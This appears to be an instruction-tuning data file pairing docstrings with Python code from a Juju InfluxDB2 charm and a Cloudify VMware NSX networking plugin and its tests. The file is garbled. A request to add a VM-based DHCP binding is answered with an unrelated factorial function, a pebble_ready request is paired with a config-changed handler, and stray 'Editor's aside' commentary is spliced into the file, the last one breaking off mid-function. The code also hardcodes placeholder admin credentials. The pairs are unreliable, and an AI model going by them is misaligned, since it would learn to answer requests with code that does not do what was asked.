[/INST] def best_action(self): + A_best = list(self.expected_values.keys())[ + np.argmax([ev["mean"] for ev in self.expected_values.values()]) + ] + return A_best +[INST] Handle the pebble_ready event for the influxdb2 container.. [/INST] def _on_config_changed(self, event: HookEvent) -> None: + container = self.unit.get_container(WORKLOAD_CONTAINER) + try: + plan = container.get_plan().to_dict() + except (APIError, ConnectionError) as error: + logger.debug(f"The Pebble API is not ready yet. Error message: {error}") + event.defer() + return + logger.debug(f"[*] container plan => {plan}") + pebble_config = Layer(raw=self._influxdb2_layer()) + if plan.get("services", {}) == pebble_config.to_dict()["services"]: + logger.debug("Pebble plan has already been loaded. No need to update the config.") + return + try: + container.add_layer("influxdb2", pebble_config, combine=True) + except (APIError, ConnectionError) as error: + logger.debug(f"The Pebble API is not ready yet. Error message: {error}") + event.defer() + return + if self._is_running(container, WORKLOAD_CONTAINER): + container.stop(WORKLOAD_CONTAINER) + container.start(WORKLOAD_CONTAINER) + self.unit.status = ActiveStatus("Pod is ready") +[INST] Provide Grafana with data source information.. [/INST] def _on_grafana_source_relation_changed(self, event: RelationEvent) -> None: + if not self.model.unit.is_leader(): + return + relation_data = { + "private-address": subprocess.check_output(["unit-get", "private-address"]) + .decode() + .strip(), + "port": "8086", + "source-type": "influxdb", + } + event.relation.data[self.unit].update(relation_data) +[INST] Returns initial Pebble configuration layer for Influxdb2.. [/INST] def _influxdb2_layer(self) -> dict: + return { + "summary": "influxdb2 layer", + "description": "pebble config layer for influxdb2", + "services": { + "influxdb2": { + "override": "replace", + "summary": "influxdb2 service", + "command": "/entrypoint.sh influxd", + "startup": "enabled", + "environment": { + "DOCKER_INFLUXDB_INIT_MODE": "setup", + "DOCKER_INFLUXDB_INIT_USERNAME": "admin", + "DOCKER_INFLUXDB_INIT_PASSWORD": "thisisatest123", + "DOCKER_INFLUXDB_INIT_ORG": "influxdata", + "DOCKER_INFLUXDB_INIT_BUCKET": "default", + "DOCKER_INFLUXDB_INIT_RETENTION": "0s", + "DOCKER_INFLUXDB_INIT_ADMIN_TOKEN": "asdfasdfasdf", + "INFLUXD_BOLT_PATH": "/var/lib/influxdbv2/influxd.bolt", + "INFLUXD_ENGINE_PATH": "/var/lib/influxdbv2", + "INFLUXD_HTTP_BIND_ADDRESS": ":8086", + }, + } + }, + } +[INST] Helper method to determine if a given service is running in a given container. [/INST] def _is_running(self, container: Container, service: str) -> bool: + try: + svc = container.get_service(service) + return svc.current == ServiceStatus.ACTIVE + except ModelError: + return False +[INST] Delete firewall rule, as resource_id used response +from add_firewall_rule. [/INST] def delete_firewall_rule(client_session, resource_id): + try: + esg_id, rule_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result = client_session.delete( + 'firewallRule', uri_parameters={ + 'edgeId': esg_id, 'ruleId': rule_id + }) + common.check_raw_result(result) +[INST] common function with any call from clint_session. 
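Editor's aside: the config-changed handler in the charm code above only re-applies the Pebble layer when the generated services section differs from the current plan; at its core that check is a plain dict comparison, sketched here with made-up service dicts.

def plan_needs_update(current_plan, desired_layer):
    # compare only the services sections, mirroring the handler above
    return current_plan.get('services', {}) != desired_layer['services']

current = {'services': {'influxdb2': {'override': 'replace',
                                      'command': '/entrypoint.sh influxd'}}}
desired = {'services': {'influxdb2': {'override': 'replace',
                                      'command': '/entrypoint.sh influxd',
                                      'startup': 'enabled'}}}
print(plan_needs_update(current, desired))   # True: the layer must be (re)applied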
[/INST] def _common_uninstall_external_and_unintialized( + self, resource_id, func_call, func_kwargs, additional_params=None + ): + kwargs = self._kwargs_regen(func_kwargs) + self.fake_ctx.instance.runtime_properties['resource_id'] = None + if additional_params: + for i in additional_params: + self.fake_ctx.instance.runtime_properties[i] = i + func_call(**kwargs) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) + kwargs = self._kwargs_regen(func_kwargs) + self.fake_ctx.instance.runtime_properties['resource_id'] = resource_id + self.fake_ctx.node.properties['use_external_resource'] = True + if additional_params: + for i in additional_params: + self.fake_ctx.instance.runtime_properties[i] = i + func_call(**kwargs) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) + if resource_id.find('|') >= 0: + new_resource_id = resource_id + "|_" + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + new_resource_id, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + with self.assertRaises(cfy_exc.NonRecoverableError) as error: + func_call(**kwargs) + self.assertTrue(str(error.exception).find( + 'Unexpected error retrieving resource ID' + ) == 0) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + resource_id, func_kwargs + ) + if additional_params: + for i in additional_params: + self.fake_ctx.instance.runtime_properties[i] = i + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + fake_client.assert_called_with( + 'raml', 'host', 'username', 'password' + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual(runtime['resource_id'], resource_id) + self.assertEqual( + runtime['nsx_auth'], { + 'username': 'username', + 'password': 'password', + 'host': 'host', + 'raml': 'raml' + } + ) + if additional_params: + for i in additional_params: + self.assertEqual(runtime.get(i), i) +[INST] check that we have RecoverableError with empty properties. [/INST] def _common_run_relationship(self, func): + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, {}, False + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + with self.assertRaises(cfy_exc.NonRecoverableError): + func(**kwargs) +[INST] Check skip install logic if we have use_existing and don't have +additional checks inside. [/INST] def _common_use_existing_without_run(self, resource_id, func_call, + func_kwargs): + kwargs = self._kwargs_regen(func_kwargs) + kwargs['use_external_resource'] = True + kwargs['resource_id'] = resource_id + func_call(**kwargs) + self.assertTrue( + self.fake_ctx.instance.runtime_properties['use_external_resource'] + ) +[INST] Check skip install logic if we have resource_id +or have issues with session. 
[/INST] def _common_install(self, resource_id, func_call, func_kwargs, + relationships=None): + kwargs = self._kwargs_regen(func_kwargs) + self.fake_ctx.instance.runtime_properties['resource_id'] = resource_id + if relationships: + self.fake_ctx.instance.relationships = relationships + func_call(**kwargs) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + if relationships: + self.fake_ctx.instance.relationships = relationships + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + fake_client.assert_called_with( + 'raml', 'host', 'username', 'password' + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertFalse('resource_id' in runtime) + self.assertEqual( + runtime['nsx_auth'], { + 'username': 'username', + 'password': 'password', + 'host': 'host', + 'raml': 'raml' + } + ) +[INST] check install logic that read/extract current state and than send +update request. [/INST] def _common_install_extract_or_read_and_update( + self, resource_id, func_call, func_kwargs, + extract_args=None, extract_kwargs=None, extract_response=None, + read_args=None, read_kwargs=None, read_response=None, + create_args=None, create_kwargs=None, create_response=None, + update_args=None, update_kwargs=None, update_response=None, + relationships=None + ): + self._common_install(resource_id, func_call, func_kwargs, + relationships=relationships) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + extract_response=extract_response, + read_response=read_response, + create_response=create_response, + update_response=update_response + ) + if relationships: + self.fake_ctx.instance.relationships = relationships + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + extract_response=extract_response, + extract_args=extract_args, extract_kwargs=extract_kwargs, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + create_response=create_response, + create_args=create_args, create_kwargs=create_kwargs, + update_response=update_response, + update_args=update_args, update_kwargs=update_kwargs + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], + resource_id + ) +[INST] check install logic run create only. [/INST] def _common_install_create( + self, resource_id, func_call, func_kwargs, + create_args, create_kwargs, create_response + ): + self._common_install(resource_id, func_call, func_kwargs) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + create_response=create_response + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + create_response=create_response, + create_args=create_args, create_kwargs=create_kwargs + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], + resource_id + ) +[INST] check install logic that check 'existing' by read +and than run create. 
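Editor's aside: a self-contained sketch of the mock.patch pattern these test helpers rely on: patch the client class, run the code under test, then assert the constructor arguments. The `__main__` module path and the placeholder `NsxClient`/`login` here stand in for the real `cloudify_nsx.library.nsx_common.NsxClient` target used above and are not the actual plugin API.

from unittest import mock

class NsxClient(object):
    # placeholder for the real client class that the helpers patch
    def __init__(self, raml, host, username, password):
        self.host = host

def login(cfg):
    # stands in for the code under test, which builds a client from credentials
    return NsxClient(cfg['raml'], cfg['host'], cfg['username'], cfg['password'])

fake_client = mock.MagicMock()
with mock.patch('__main__.NsxClient', fake_client):
    login({'raml': 'raml', 'host': 'host',
           'username': 'username', 'password': 'password'})
fake_client.assert_called_with('raml', 'host', 'username', 'password')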
[/INST] def _common_install_read_and_create( + self, resource_id, func_call, func_kwargs, read_args, read_kwargs, + read_response, create_args, create_kwargs, create_response, + recheck_runtime=None + ): + self._common_install(resource_id, func_call, func_kwargs) + if read_response: + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + self.fake_ctx.node.properties['use_external_resource'] = True + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], resource_id + ) + if recheck_runtime: + for field in recheck_runtime: + self.assertEqual( + runtime[field], + recheck_runtime[field] + ) + # use_external_resource=True, but empty response + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + self.fake_ctx.node.properties['use_external_resource'] = True + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=SUCCESS_RESPONSE + ) + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + ) + self.assertFalse( + 'resource_id' in self.fake_ctx.instance.runtime_properties + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response + ) + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + ) + self.assertFalse( + 'resource_id' in self.fake_ctx.instance.runtime_properties + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=SUCCESS_RESPONSE, + create_response=create_response + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + create_response=create_response, + create_args=create_args, create_kwargs=create_kwargs + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], + resource_id + ) +[INST] For functions where we only run delete directly. 
[/INST] def _common_uninstall_delete( + self, resource_id, func_call, func_kwargs, delete_args, delete_kwargs, + additional_params=None, read_args=None, read_kwargs=None, + read_response=None + ): + self._common_uninstall_external_and_unintialized( + resource_id, func_call, func_kwargs, + additional_params=additional_params + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + resource_id, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response, + delete_response=SUCCESS_RESPONSE + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + delete_response=SUCCESS_RESPONSE, + delete_args=delete_args, delete_kwargs=delete_kwargs + ) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) +[INST] delete when read/update enought. [/INST] def _common_uninstall_read_update( + self, resource_id, func_call, func_kwargs, read_args, read_kwargs, + read_response, update_args, update_kwargs, additional_params=None + ): + self._common_uninstall_external_and_unintialized( + resource_id, func_call, func_kwargs, + additional_params=additional_params + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + resource_id, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response, + update_response=SUCCESS_RESPONSE + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + update_response=SUCCESS_RESPONSE, + update_args=update_args, update_kwargs=update_kwargs + ) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) +[INST] This function adds an interface gw to one dlr. [/INST] def dlr_add_interface(client_session, dlr_id, interface_ls_id, interface_ip, + interface_subnet, name=None, vnic=None): + dlr_interface_dict = client_session.extract_resource_body_example( + 'interfaces', 'create' + ) + interface = dlr_interface_dict['interfaces']['interface'] + interface['addressGroups']['addressGroup']['primaryAddress'] = interface_ip + interface['addressGroups']['addressGroup']['subnetMask'] = interface_subnet + interface['isConnected'] = "true" + interface['connectedToId'] = interface_ls_id + interface['name'] = name + interface['index'] = vnic + result_raw = client_session.create( + 'interfaces', uri_parameters={'edgeId': dlr_id}, + query_parameters_dict={'action': "patch"}, + request_body_dict=dlr_interface_dict + ) + common.check_raw_result(result_raw) + ifindex = result_raw['body']['interfaces']['interface']['index'] + resource_id = "%s|%s" % (ifindex, dlr_id) + return ifindex, resource_id +[INST] This function sets the default firewall rule to accept or deny. 
[/INST] def esg_fw_default_set(client_session, esg_id, def_action, + logging_enabled=None): + if not logging_enabled: + logging_enabled = 'false' + def_policy_body = client_session.extract_resource_body_example( + 'defaultFirewallPolicy', 'update' + ) + firewall_default_policy = def_policy_body['firewallDefaultPolicy'] + firewall_default_policy['action'] = def_action + firewall_default_policy['loggingEnabled'] = logging_enabled + cfg_result = client_session.update('defaultFirewallPolicy', + uri_parameters={'edgeId': esg_id}, + request_body_dict=def_policy_body) + common.check_raw_result(cfg_result) +[INST] This function deletes an interface gw to one dlr. [/INST] def dlr_del_interface(client_session, resource_id): + try: + ifindex, dlr_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result_raw = client_session.delete( + 'interfaces', uri_parameters={'edgeId': dlr_id}, + query_parameters_dict={ + 'index': ifindex + }) + common.check_raw_result(result_raw) +[INST] This function deletes a default gw to one dlr. [/INST] def dlr_del_dgw(client_session, resource_id): + result_raw = client_session.delete('routingConfig', + uri_parameters={'edgeId': resource_id}) + common.check_raw_result(result_raw) +[INST] This function enables/disables the DHCP server on an Edge Gateway +and sets the logging status and Level. [/INST] def dhcp_server(client_session, esg_id, enabled=None, syslog_enabled=None, + syslog_level=None): + change_needed = False + raw_result = client_session.read( + 'dhcp', uri_parameters={'edgeId': esg_id}) + common.check_raw_result(raw_result) + current_dhcp_config = raw_result['body'] + new_dhcp_config = current_dhcp_config + if enabled: + if current_dhcp_config['dhcp']['enabled'] == 'false': + new_dhcp_config['dhcp']['enabled'] = 'true' + change_needed = True + else: + if current_dhcp_config['dhcp']['enabled'] == 'true': + new_dhcp_config['dhcp']['enabled'] = 'false' + change_needed = True + if syslog_enabled == 'true': + if current_dhcp_config['dhcp']['logging']['enable'] == 'false': + new_dhcp_config['dhcp']['logging']['enable'] = 'true' + change_needed = True + elif syslog_enabled == 'false': + if current_dhcp_config['dhcp']['logging']['enable'] == 'true': + new_dhcp_config['dhcp']['logging']['enable'] = 'false' + change_needed = True + if syslog_level: + if current_dhcp_config['dhcp']['logging']['logLevel'] != syslog_level: + new_dhcp_config['dhcp']['logging']['logLevel'] = syslog_level + change_needed = True + if change_needed: + result = client_session.update('dhcp', + uri_parameters={'edgeId': esg_id}, + request_body_dict=new_dhcp_config) + common.check_raw_result(result) +[INST] This function configures vnic interfaces on ESGs. 
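Editor's aside: the `dhcp_server` helper above follows a read, compare, update-only-if-changed pattern against the edge configuration. Below is a generic, runnable sketch of that idiom; the `toggle_flag` helper, the in-memory `_store`, and the key names are all placeholders, not the NSX API.

def toggle_flag(read_fn, update_fn, key, desired):
    # generic read-compare-update: only push a change when the value differs
    config = read_fn()
    if config[key] == desired:
        return False          # nothing to do
    config[key] = desired
    update_fn(config)
    return True

# toy in-memory "API" standing in for client_session.read/update
_store = {'enabled': 'false'}
changed = toggle_flag(lambda: dict(_store), _store.update, 'enabled', 'true')
print(changed, _store)   # True {'enabled': 'true'}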
[/INST] def esg_cfg_interface(client_session, esg_id, ifindex, ipaddr=None, + netmask=None, prefixlen=None, name=None, mtu=None, + is_connected=None, portgroup_id=None, vnic_type=None, + enable_send_redirects=None, enable_proxy_arp=None, + secondary_ips=None): + vnic_config = client_session.read( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id} + )['body'] + if not mtu: + mtu = 1500 + if not vnic_type: + vnic_type = 'internal' + vnic_config['vnic']['mtu'] = mtu + vnic_config['vnic']['type'] = vnic_type + if name: + vnic_config['vnic']['name'] = name + if portgroup_id: + vnic_config['vnic']['portgroupId'] = portgroup_id + if enable_send_redirects: + vnic_config['vnic']['enableSendRedirects'] = enable_send_redirects + if enable_proxy_arp: + vnic_config['vnic']['enableProxyArp'] = enable_proxy_arp + if is_connected: + vnic_config['vnic']['isConnected'] = is_connected + if ipaddr and (netmask or prefixlen): + address_group = {} + sec_ips = [] + if netmask: + address_group['subnetMask'] = netmask + if prefixlen: + address_group['subnetPrefixLength'] = str(prefixlen) + if secondary_ips: + sec_ips = secondary_ips + address_group['primaryAddress'] = ipaddr + address_group['secondaryAddresses'] = {'ipAddress': sec_ips} + vnic_config['vnic']['addressGroups'] = {'addressGroup': address_group} + cfg_result = client_session.update( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id}, + request_body_dict=vnic_config) + common.check_raw_result(cfg_result) + return ifindex, "%s|%s" % (ifindex, esg_id) +[INST] This function resets the vnic configuration of an ESG to its default +state. [/INST] def esg_clear_interface(client_session, resource_id): + try: + ifindex, esg_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + vnic_config = client_session.read( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id} + )['body'] + vnic_config['vnic']['mtu'] = '1500' + vnic_config['vnic']['type'] = 'internal' + vnic_config['vnic']['name'] = 'vnic{}'.format(ifindex) + vnic_config['vnic']['addressGroups'] = None + vnic_config['vnic']['portgroupId'] = None + vnic_config['vnic']['portgroupName'] = None + vnic_config['vnic']['enableProxyArp'] = 'false' + vnic_config['vnic']['enableSendRedirects'] = 'false' + vnic_config['vnic']['isConnected'] = 'false' + cfg_result = client_session.update( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id}, + request_body_dict=vnic_config) + common.check_raw_result(cfg_result) +[INST] This function clears the default gateway config on an ESG. [/INST] def esg_dgw_clear(client_session, resource_id): + try: + esg_id, _ = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + rtg_cfg['staticRouting']['defaultRoute'] = None + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) +[INST] This function sets the default gateway on an ESG. 
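Editor's aside: several helpers in this section encode two identifiers into a single resource_id joined by "|" and split it again on teardown. A tiny sketch of that round trip with hypothetical ids; the real helpers raise cloudify's NonRecoverableError where this uses ValueError.

def make_resource_id(*parts):
    return '|'.join(str(p) for p in parts)

def split_resource_id(resource_id, expected_parts):
    parts = resource_id.split('|')
    if len(parts) != expected_parts:
        raise ValueError('Unexpected error retrieving resource ID: %s' % resource_id)
    return parts

rid = make_resource_id('vnic3', 'edge-17')      # hypothetical ifindex / edge id
ifindex, esg_id = split_resource_id(rid, 2)
print(ifindex, esg_id)   # vnic3 edge-17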
[/INST] def esg_dgw_set(client_session, esg_id, dgw_ip, vnic, mtu=None, + admin_distance=None): + if not mtu: + mtu = '1500' + if not admin_distance: + admin_distance = '1' + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + rtg_cfg['staticRouting']['defaultRoute'] = { + 'vnic': vnic, 'gatewayAddress': dgw_ip, + 'adminDistance': admin_distance, 'mtu': mtu + } + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) + return "%s|%s" % (esg_id, dgw_ip) +[INST] This function adds a static route to an ESG. [/INST] def esg_route_add(client_session, esg_id, network, next_hop, vnic=None, + mtu=None, admin_distance=None, description=None): + if not mtu: + mtu = '1500' + if not admin_distance: + admin_distance = '1' + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + if rtg_cfg['staticRouting']['staticRoutes']: + routes = client_session.normalize_list_return( + rtg_cfg['staticRouting']['staticRoutes']['route'] + ) + else: + routes = [] + new_route = { + 'vnic': vnic, 'network': network, 'nextHop': next_hop, + 'adminDistance': admin_distance, 'mtu': mtu, + 'description': description + } + routes.append(new_route) + rtg_cfg['staticRouting']['staticRoutes'] = {'route': routes} + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) + return "%s|%s|%s" % (esg_id, network, next_hop) +[INST] This function deletes a static route to an ESG. [/INST] def esg_route_del(client_session, resource_id): + try: + esg_id, network, next_hop = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + if rtg_cfg['staticRouting']['staticRoutes']: + routes = client_session.normalize_list_return( + rtg_cfg['staticRouting']['staticRoutes']['route'] + ) + else: + ctx.logger.info("No static routes") + return + routes_filtered = [ + route for route in routes if not ( + route['network'] == network and route['nextHop'] == next_hop + ) + ] + if len(routes_filtered) == len(routes): + ctx.logger.info( + "Wrong number of routes, i have not found any for delete" + ) + return + rtg_cfg['staticRouting']['staticRoutes'] = {'route': routes_filtered} + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) +[INST] This function adds a DHCP Pool to an edge DHCP Server. [/INST] def add_dhcp_pool(client_session, esg_id, ip_range, default_gateway=None, + subnet_mask=None, domain_name=None, dns_server_1=None, + dns_server_2=None, lease_time=None, auto_dns=None): + dhcp_pool_dict = {'ipRange': ip_range, + 'defaultGateway': default_gateway, + 'subnetMask': subnet_mask, + 'domainName': domain_name, + 'primaryNameServer': dns_server_1, + 'secondaryNameServer': dns_server_2, + 'leaseTime': lease_time, + 'autoConfigureDNS': auto_dns} + result = client_session.create( + 'dhcpPool', uri_parameters={'edgeId': esg_id}, + request_body_dict={'ipPool': dhcp_pool_dict} + ) + common.check_raw_result(result) + return "%s|%s" % (esg_id, result['objectId']) +[INST] This function deletes a DHCP Pools from an edge DHCP Server. 
[/INST] def delete_dhcp_pool(client_session, resource_id): + try: + esg_id, pool_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result = client_session.delete( + 'dhcpPoolID', uri_parameters={'edgeId': esg_id, 'poolID': pool_id}) + common.check_raw_result(result) +[INST] This function adds a MAC-based static binding entry to an edge DHCP Server. [/INST] def add_mac_binding(client_session, esg_id, mac, hostname, ip, + default_gateway=None, subnet_mask=None, domain_name=None, + dns_server_1=None, dns_server_2=None, lease_time=None, + auto_dns=None): + binding_dict = { + 'macAddress': mac, 'hostname': hostname, 'ipAddress': ip, + 'defaultGateway': default_gateway, 'subnetMask': subnet_mask, + 'domainName': domain_name, 'primaryNameServer': dns_server_1, + 'secondaryNameServer': dns_server_2, 'leaseTime': lease_time, + 'autoConfigureDNS': auto_dns + } + result = client_session.create( + 'dhcpStaticBinding', uri_parameters={'edgeId': esg_id}, + request_body_dict={'staticBinding': binding_dict} + ) + common.check_raw_result(result) + return "%s|%s" % (esg_id, result['objectId']) +[INST] This function adds a VM-based static binding entry to an edge DHCP Server. [/INST] def factorial(n): + if n == 0 or n == 1: + return 1 + else: + return n * factorial(n - 1) + print(factorial(5)) +[INST] This function deletes a DHCP binding from an edge DHCP Server. [/INST] def delete_dhcp_binding(client_session, resource_id): + try: + esg_id, bindingID = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result = client_session.delete( + 'dhcpStaticBindingID', + uri_parameters={'edgeId': esg_id, 'bindingID': bindingID} + ) + common.check_raw_result(result) +[INST] We need this because nsxclient does not support unicode strings. [/INST] def _cleanup_properties(value): + if isinstance(value, unicode): + return str(value) + if isinstance(value, dict): + return _cleanup_properties_dict(value) + if isinstance(value, list): + return _cleanup_properties_list(value) + return value +[INST] Convert all fields in a dict to strings. [/INST] def _cleanup_properties_dict(properties_dict): + result = {} + for key in properties_dict.iterkeys(): + value = properties_dict[key] + if isinstance(key, (unicode, int)): + key = str(key) + result[key] = _cleanup_properties(value) + return result +[INST] Return None if all fields are empty, else the original dict. [/INST] def _cleanup_if_empty(value): + if any(value[key] is not None for key in value): + return value + else: + return None +[INST] Common code for deleting an object with client/resource_id params. 
[/INST] def delete_object(func_call, element_struct, kwargs, elements_to_clean=None): + use_existing, _ = get_properties(element_struct, kwargs) + if use_existing: + remove_properties(element_struct) + if elements_to_clean: + for name in elements_to_clean: + remove_properties(name) + ctx.logger.info("Used existed") + return + resource_id = ctx.instance.runtime_properties.get('resource_id') + if not resource_id: + remove_properties(element_struct) + if elements_to_clean: + for name in elements_to_clean: + remove_properties(name) + ctx.logger.info("Not fully created, skip") + return + client_session = nsx_login(kwargs) + attempt_with_rerun( + func_call, + client_session=client_session, + resource_id=resource_id + ) + ctx.logger.info("delete %s" % resource_id) + remove_properties(element_struct) + if elements_to_clean: + for name in elements_to_clean: + remove_properties(name) +[INST] Rerun func several times, useful after dlr/esg delete. [/INST] def attempt_with_rerun(func, **kwargs): + i = 10 + while i >= 0: + try: + func(**kwargs) + return + except cfy_exc.RecoverableError as ex: + ctx.logger.error("%s: %s attempts left: Message: %s " % ( + func.__name__, i, str(ex) + )) + if not i: + raise cfy_exc.RecoverableError( + message="Retry %s little later" % func.__name__ + ) + time.sleep(30) + i -= 1 +[INST] Get login configs from default file. [/INST] def _nsx_login_file(): + cfg = {} + if os.path.isfile(DEFAULT_CONFIG_PATH): + try: + with open(DEFAULT_CONFIG_PATH) as f: + cfg = yaml.load(f.read()) + except Exception as e: + raise cfy_exc.NonRecoverableError( + "Unable to read %s configuration file %s." % ( + str(e), + DEFAULT_CONFIG_PATH + ) + ) + if not isinstance(cfg, dict): + raise cfy_exc.NonRecoverableError( + "Unable to parse configuration file %s." % DEFAULT_CONFIG_PATH + ) + return cfg +[INST] Use values form properties/of file for login to nsx. [/INST] def nsx_login(kwargs): + if ctx.type == NODE_INSTANCE: + nsx_auth = _get_properties('nsx_auth', kwargs) + else: + nsx_auth = kwargs.get('nsx_auth') + ctx.logger.info("NSX login...") + cfg_auth = _nsx_login_file() + cfg_auth.update(nsx_auth) + user = cfg_auth.get('username') + password = cfg_auth.get('password') + ip = cfg_auth.get('host') + if not ip and ctx.type == NODE_INSTANCE: + ip = ctx.instance.host_ip + ctx.logger.info("Used host from container: %s" % ip) + ctx.logger.info("Used %s@%s" % (user, ip)) + if not ip or not user or not password: + raise cfy_exc.NonRecoverableError( + "please check your credentials" + ) + raml_file = cfg_auth.get('raml') + if not raml_file: + resource_dir = resource_filename(__name__, 'api_spec') + raml_file = '{}/nsxvapi.raml'.format(resource_dir) + ctx.logger.info("Will be used internal: %s" % raml_file) + client = NsxClient(raml_file, ip, user, password) + ctx.logger.info("NSX logged in") + return client +[INST] check that we have 'success' http status. [/INST] def check_raw_result(result_raw): + if result_raw['status'] < 200 or result_raw['status'] >= 300: + ctx.logger.error("Status %s" % result_raw['status']) + raise cfy_exc.NonRecoverableError( + "We have error with request." + ) +[INST] run client_session.read(searched_resource, **kwargs) with checks +and return only result selected by path. 
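Editor's aside: a compact, standalone version of the retry loop that `attempt_with_rerun` above implements. The attempt count and sleep are shortened here, and a plain RuntimeError stands in for cloudify's RecoverableError; the `flaky` function is only there to exercise the retries.

import time

def attempt_with_rerun(func, attempts=3, delay=0.1, **kwargs):
    # retry func(**kwargs) a few times before giving up
    for attempt in range(attempts, 0, -1):
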